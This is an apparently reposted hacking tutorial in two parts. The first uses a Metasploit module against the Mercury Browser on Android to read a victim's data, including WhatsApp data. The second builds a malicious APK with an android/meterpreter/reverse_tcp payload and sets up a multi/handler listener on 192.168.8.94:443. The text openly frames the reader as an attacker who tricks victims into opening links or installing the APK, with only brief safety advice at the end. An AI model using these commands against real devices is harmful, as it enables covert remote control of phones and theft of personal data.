Android with Mercury Browser parseuri exploit.

Android with Mercury Browser parseuri exploit.

 

 Start Metasploit and load the exploit as shown below. Set the required options ( i.e actually we need to set only one option, localhost )

Then type command “exploit” as shown below. A server will start at the localhost as shown below.

Now the only thing we need to do is make the Android users open the above url with Mercury browser. Once the android user opens the link, the exploit will run as shown below.

Now, on your localhost ( attacker machine ), open a browser and type the android user’s IP address as shown below. We got the IP address in the above picture only. As shown below, you can access all the data of our victim.

Given below are the victim’s Whatsapp data.

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=

As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Info:

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Info:

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:

Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.1iD0iK8q.dpuf